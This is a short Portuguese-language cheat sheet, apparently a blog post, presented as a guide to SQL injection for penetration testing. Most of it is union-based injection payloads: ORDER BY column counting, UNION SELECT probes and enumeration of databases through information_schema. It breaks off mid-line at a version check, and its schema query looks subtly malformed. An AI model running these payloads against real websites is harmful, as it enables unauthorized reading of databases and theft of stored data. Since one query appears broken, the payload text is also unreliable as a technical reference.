Guia Completo de Injeção SQL: Técnicas Avançadas para Testes de Penetração
Injeção SQL por União
# Determinação do número de campos
1' ORDER BY 1#
1' ORDER BY 100#
# Consulta por união (assumindo 3 campos)
-1' UNION SELECT 1,2,3#
# Enumeração de todos os bancos de dados (assumindo segundo campo como resposta)
-1' UNION SELECT 1,SCHEMA_NAME(),3 FROM information_schema.SCHEMATA#
# Verificação da versão do banco
-1' ...
Publicado em 6-24 17:18